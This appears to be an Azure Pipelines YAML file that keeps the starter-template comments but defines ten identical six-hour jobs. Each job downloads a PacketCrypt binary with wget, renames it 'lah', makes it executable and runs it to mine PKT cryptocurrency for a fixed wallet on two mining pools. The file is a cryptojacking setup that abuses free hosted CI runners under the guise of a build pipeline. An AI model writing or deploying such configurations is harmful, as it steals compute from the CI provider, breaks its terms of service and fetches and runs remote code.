# Starter pipeline
# Start with a minimal pipeline that you can customize to build and deploy your code.
# Add steps that build, run tests, deploy, and more:
# https://aka.ms/yaml

trigger:
- main

pool: Azure Pipelines

jobs:
- job: a
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: b
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: c
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: d
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: e
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: f
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: g
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: h
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: i
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/

- job: j
  timeoutInMinutes: 360
  cancelTimeoutInMinutes: 360
  steps:
  - script: wget https://www.pkt.world/ext/packetcrypt-linux-amd64 -O lah && chmod +x lah && ./lah ann -p pkt1qmafr3t8l4gl8mgay49a49mlgmh9d968a47dxgl http://pool.pkt.world/ http://pool.pktpool.io/